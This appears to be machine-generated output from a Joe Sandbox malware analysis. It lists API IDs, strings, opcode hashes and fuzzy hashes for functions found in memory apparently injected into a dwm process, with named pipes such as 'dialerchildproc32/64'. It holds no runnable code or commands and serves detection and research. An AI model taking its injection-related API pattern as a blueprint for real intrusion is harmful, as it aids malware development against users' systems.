                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000001D.00000002.12893897954.000002311E400000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002311E400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_29_2_2311e400000_dwm.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                                                      • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                                                                      • API String ID: 2171963597-1373409510
                                                                                                      • Opcode ID: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
                                                                                                      • Instruction ID: b43173b5175a63e1ea311b7b9f40bc169f782f92b161f0e26ab92fcbedf3d6d2
                                                                                                      • Opcode Fuzzy Hash: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
                                                                                                      • Instruction Fuzzy Hash: 3E211A36714A4082EB10CB65E54839A6BA0F789FA4F504215EB9D82FA8DFBCD259DB10
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000001D.00000002.12893897954.000002311E400000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002311E400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_29_2_2311e400000_dwm.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc
                                                                                                      • String ID: api-ms-$ext-ms-
                                                                                                      • API String ID: 190572456-537541572
                                                                                                      • Opcode ID: f5082d46cd3e032fbbfcba80e3c796c34016e7f71c0b089d04f54faabee83c69
                                                                                                      • Instruction ID: ebc3b4a4140b2f35f6b986a80ecd9d59742e79376495863dbad7ed8d8cc43b7b
                                                                                                      • Opcode Fuzzy Hash: f5082d46cd3e032fbbfcba80e3c796c34016e7f71c0b089d04f54faabee83c69
                                                                                                      • Instruction Fuzzy Hash: 2241D27131164086FE15DF96A8083DD2A91B708FE0F0959399FCDCBB84DABCD629A320
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000001D.00000002.12893897954.000002311E400000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002311E400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_29_2_2311e400000_dwm.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                                                      • String ID: d
                                                                                                      • API String ID: 3743429067-2564639436
                                                                                                      • Opcode ID: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
                                                                                                      • Instruction ID: fdadaceb8aae016d654d229f64f4b9ba58908a6f41e159a61f1ec3b4232faf6f
                                                                                                      • Opcode Fuzzy Hash: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
                                                                                                      • Instruction Fuzzy Hash: 24414F73614B8097EB648F91E4487DABBA1F389B84F008125DBC947B58DF7CE665CB10
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000001D.00000002.12893897954.000002311E400000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002311E400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_29_2_2311e400000_dwm.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                      • String ID: api-ms-
                                                                                                      • API String ID: 2559590344-2084034818
                                                                                                      • Opcode ID: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
                                                                                                      • Instruction ID: 6757967f72e0bf41d61ef33d04c5e0070346b96b0374b0384ce59ab21a0fa50d
                                                                                                      • Opcode Fuzzy Hash: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
                                                                                                      • Instruction Fuzzy Hash: 9D31E93671264091FE11DB82A4087D96B94B788FA4F1E4534DFAD87B94DF7CD2649320
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000001D.00000002.12893897954.000002311E400000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002311E400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_29_2_2311e400000_dwm.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                      • String ID: CONOUT$
                                                                                                      • API String ID: 3230265001-3130406586
                                                                                                      • Opcode ID: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
                                                                                                      • Instruction ID: 7da6fc98da9e409b1bda3d8e867def4bbf2ef8fbbd32ae5beb958edb4b9c405e
                                                                                                      • Opcode Fuzzy Hash: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
                                                                                                      • Instruction Fuzzy Hash: F2118221314F5086EB509B96E84835976A0F788FE4F044224EB9EC7F98DFBCD6249754
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000001D.00000002.12893897954.000002311E400000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002311E400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_29_2_2311e400000_dwm.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Heap$Process$AllocFree
                                                                                                      • String ID: dialer
                                                                                                      • API String ID: 756756679-3528709123
                                                                                                      • Opcode ID: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
                                                                                                      • Instruction ID: db0063c46e893986c85aa5a181160c779074c189744ddf5a5afcd768ff38a55c
                                                                                                      • Opcode Fuzzy Hash: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
                                                                                                      • Instruction Fuzzy Hash: 85317131701B51D2EA15DF96A8486EA6BA0FB48F84F0841349FCC8BF55EB7CE6B19710
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000001D.00000002.12893897954.000002311E400000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002311E400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_29_2_2311e400000_dwm.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                                                      • String ID:
                                                                                                      • API String ID: 517849248-0
                                                                                                      • Opcode ID: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
                                                                                                      • Instruction ID: 1436141585db61b9cd323bea63ccb81ac3803dbb99db4b04e4d6733691c5e0e3
                                                                                                      • Opcode Fuzzy Hash: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
                                                                                                      • Instruction Fuzzy Hash: 8F016931300A4196EB10DB92A85C3996BA1F788FC0F498035CF8D83B54DEBCDA99C720
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000001D.00000002.12893897954.000002311E400000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002311E400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_29_2_2311e400000_dwm.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                                                      • String ID:
                                                                                                      • API String ID: 449555515-0
                                                                                                      • Opcode ID: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
                                                                                                      • Instruction ID: 39b3fd6f244dfdbbef7de30a66302c04ed3fc3db4916ffe4371912624f1dad66
                                                                                                      • Opcode Fuzzy Hash: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
                                                                                                      • Instruction Fuzzy Hash: 03111B7571174086FF249BA1E80D79A6BA0BB48F85F040429DB8D87B58EF7CD6289720
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000001D.00000002.12893897954.000002311E400000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002311E400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_29_2_2311e400000_dwm.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FinalHandleNamePathlstrlen
                                                                                                      • String ID: \\?\
                                                                                                      • API String ID: 2719912262-4282027825
                                                                                                      • Opcode ID: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
                                                                                                      • Instruction ID: d1ed3f87040249f2ee0493cfe87e2d83262cb0e21fa307c14222bc9f0c44543e
                                                                                                      • Opcode Fuzzy Hash: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
                                                                                                      • Instruction Fuzzy Hash: A0F03C3230464192EB209BA5E4983D96BA0F744F98F848034DB8D87E58DFACD798DB10
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000001D.00000002.12893897954.000002311E400000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002311E400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_29_2_2311e400000_dwm.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CombinePath
                                                                                                      • String ID: \\.\pipe\
                                                                                                      • API String ID: 3422762182-91387939
                                                                                                      • Opcode ID: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
                                                                                                      • Instruction ID: 7ba8a71ac0ebfd5873a752557b9b3bf926ff31fbfcdac4754c18b1afdfc9f2dd
                                                                                                      • Opcode Fuzzy Hash: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
                                                                                                      • Instruction Fuzzy Hash: 10F08220304B8091EE009B93B90819A6B60AB48FD0F098131DFDE87F28CEACD6A19310
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000001D.00000002.12893897954.000002311E400000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002311E400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_29_2_2311e400000_dwm.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                                      • API String ID: 4061214504-1276376045
                                                                                                      • Opcode ID: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
                                                                                                      • Instruction ID: b733f29babe42403128b9583126669eebbecf2413509bbcc5d2796be1073a7a8
                                                                                                      • Opcode Fuzzy Hash: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
                                                                                                      • Instruction Fuzzy Hash: 8CF0827131164491EF448BE0F88C3E82BA0AB48F80F042429978FC9964CFACD6A8E720
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000001D.00000002.12893897954.000002311E400000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002311E400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_29_2_2311e400000_dwm.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CaptureContextEntryFunctionLookupUnwindVirtual
                                                                                                      • String ID: NtQuerySystemInformation
                                                                                                      • API String ID: 2154932578-2549949336
                                                                                                      • Opcode ID: 74219aee19f4c8fff33bb8f441b5a8c4dce270eb6b270de61d52c61c6ba0a4a7
                                                                                                      • Instruction ID: 4f225481fd34d99c7e9c45dcac9c3a47d3e35c25bb95a2508efe19bb8b3580b7
                                                                                                      • Opcode Fuzzy Hash: 74219aee19f4c8fff33bb8f441b5a8c4dce270eb6b270de61d52c61c6ba0a4a7
                                                                                                      • Instruction Fuzzy Hash: 98F08C7221475482EB108B66F8443AAA761F789FA0F440124EF8E86B44DF7CC6A5DB14
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000001D.00000002.12893897954.000002311E400000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002311E400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_29_2_2311e400000_dwm.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Heap$Process$Free
                                                                                                      • String ID:
                                                                                                      • API String ID: 3168794593-0
                                                                                                      • Opcode ID: f1983aadbafb302923b8fe7f482f9c632134a4f8d61b19ff0aa35b357364af3e
                                                                                                      • Instruction ID: 3a32114773b0bedab0f03a5cf9a34ef01e1b56c75e2f21491d9012ab8fb9be0a
                                                                                                      • Opcode Fuzzy Hash: f1983aadbafb302923b8fe7f482f9c632134a4f8d61b19ff0aa35b357364af3e
                                                                                                      • Instruction Fuzzy Hash: C3115A32614B88D2EB549FA6A84829A77A0F389F80F044029EBCE43B24DF7CE561D710
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000001D.00000002.12893897954.000002311E400000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002311E400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_29_2_2311e400000_dwm.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ConsoleErrorLastMode
                                                                                                      • String ID:
                                                                                                      • API String ID: 953036326-0
                                                                                                      • Opcode ID: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
                                                                                                      • Instruction ID: 23ef1db3f1fcc8631bd5ca5af7e4a39578f44e212d14b2bdbda247969abc4857
                                                                                                      • Opcode Fuzzy Hash: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
                                                                                                      • Instruction Fuzzy Hash: CA818A32B1061089FF50ABE598583ED2BA0B754F84F444116DB8ED3E95DBBCE662E330
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000001D.00000002.12893897954.000002311E400000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002311E400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_29_2_2311e400000_dwm.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                      • String ID:
                                                                                                      • API String ID: 2933794660-0
                                                                                                      • Opcode ID: ac8b8696854b531a2c36d8a3483ee891c5ec117b5ea5b6300ddbe8ada65bf13e
                                                                                                      • Instruction ID: adcf7bff1c9c09910dbae9f6871f5a0dff46327a5f4a9556876c93fbe7d5abd5
                                                                                                      • Opcode Fuzzy Hash: ac8b8696854b531a2c36d8a3483ee891c5ec117b5ea5b6300ddbe8ada65bf13e
                                                                                                      • Instruction Fuzzy Hash: 3B112E22300F418AEF10DFA0E8593D437A4F71DB5CF051A25EBAD86B94DB7CD2A59350
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000001D.00000002.12893897954.000002311E400000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002311E400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_29_2_2311e400000_dwm.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileType
                                                                                                      • String ID: \\.\pipe\
                                                                                                      • API String ID: 3081899298-91387939
                                                                                                      • Opcode ID: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
                                                                                                      • Instruction ID: 9c90a73200fe15cc946f7f896f57396b2070d2061094fa000b3f2a66568c8504
                                                                                                      • Opcode Fuzzy Hash: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
                                                                                                      • Instruction Fuzzy Hash: 9871B13670078146EB64DBA599483EAAB90F784F84F440136DFCD83F9ADEB8C724A714
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000001D.00000002.12893897954.000002311E400000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002311E400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_29_2_2311e400000_dwm.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Unwind
                                                                                                      • String ID: csm$f
                                                                                                      • API String ID: 3419175465-629598281
                                                                                                      • Opcode ID: 2b68ddb093160c159f3838c1131a2f908320feabf111407c5e8bfe37d954b0ed
                                                                                                      • Instruction ID: ec0e72bf891d4615f892188efc848b1022aeb7d06f96ab5eeb920637b0fe95cf
                                                                                                      • Opcode Fuzzy Hash: 2b68ddb093160c159f3838c1131a2f908320feabf111407c5e8bfe37d954b0ed
                                                                                                      • Instruction Fuzzy Hash: 0851B13A31160086EB14CF95E44CBD93B95F384F88F198534DB9A87B48DBBDDA51E710
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000001D.00000002.12893897954.000002311E400000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002311E400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_29_2_2311e400000_dwm.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileType
                                                                                                      • String ID: \\.\pipe\
                                                                                                      • API String ID: 3081899298-91387939
                                                                                                      • Opcode ID: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
                                                                                                      • Instruction ID: 10599a368ba494ab0bfbae90569f584ce2432a653f21b26ba1cafd8b8a9e03e0
                                                                                                      • Opcode Fuzzy Hash: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
                                                                                                      • Instruction Fuzzy Hash: C851E73221478142EA749AA5915C3EAAE50F3C5F80F150435CFCE83FDADABDC6219B64
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000001D.00000002.12893897954.000002311E400000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002311E400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_29_2_2311e400000_dwm.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorFileLastWrite
                                                                                                      • String ID: U
                                                                                                      • API String ID: 442123175-4171548499
                                                                                                      • Opcode ID: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
                                                                                                      • Instruction ID: 4931302dc65883059487281cec84bcbaad6f3a11db106763f478d909e3d09caa
                                                                                                      • Opcode Fuzzy Hash: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
                                                                                                      • Instruction Fuzzy Hash: 6141A272714A4081EB20DF65E4483DA67A0F388BC4F414025EF8DC7B98DB7CD651DB50
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000001D.00000002.12893897954.000002311E400000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002311E400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_29_2_2311e400000_dwm.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExceptionFileHeaderRaise
                                                                                                      • String ID: csm
                                                                                                      • API String ID: 2573137834-1018135373
                                                                                                      • Opcode ID: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
                                                                                                      • Instruction ID: 6bdf67b479b73900e0765555f44ce69123bd7c72517881fab0c52e95c39832af
                                                                                                      • Opcode Fuzzy Hash: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
                                                                                                      • Instruction Fuzzy Hash: BE114C36208B8482EB608F15E5442997BA0F7C8F98F184220DFCD47B68DF7CC661CB00
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000001D.00000002.12893897954.000002311E400000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002311E400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_29_2_2311e400000_dwm.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Heap$Process$AllocFree
                                                                                                      • String ID:
                                                                                                      • API String ID: 756756679-0
                                                                                                      • Opcode ID: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
                                                                                                      • Instruction ID: 0ead60b27caeb94a74eca870571102c6b789b0d94e84c8f774e7a0192125fdec
                                                                                                      • Opcode Fuzzy Hash: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
                                                                                                      • Instruction Fuzzy Hash: 97217136704B8081EB118F99A4082DAB7E0FB84F94F154124EFCD87F14EABCD6629750
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000001D.00000002.12893897954.000002311E400000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002311E400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_29_2_2311e400000_dwm.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Heap$AllocProcess
                                                                                                      • String ID:
                                                                                                      • API String ID: 1617791916-0
                                                                                                      • Opcode ID: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
                                                                                                      • Instruction ID: 2fe449104d3b73ac9362b2aa6bad7e671daec3c14e7a36a4455f53222d52c19c
                                                                                                      • Opcode Fuzzy Hash: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
                                                                                                      • Instruction Fuzzy Hash: 9CE0EDB1711600C6EB049FA6D8183997AE1FB88F51F4AC024CE8D47750DFBDE5A9D760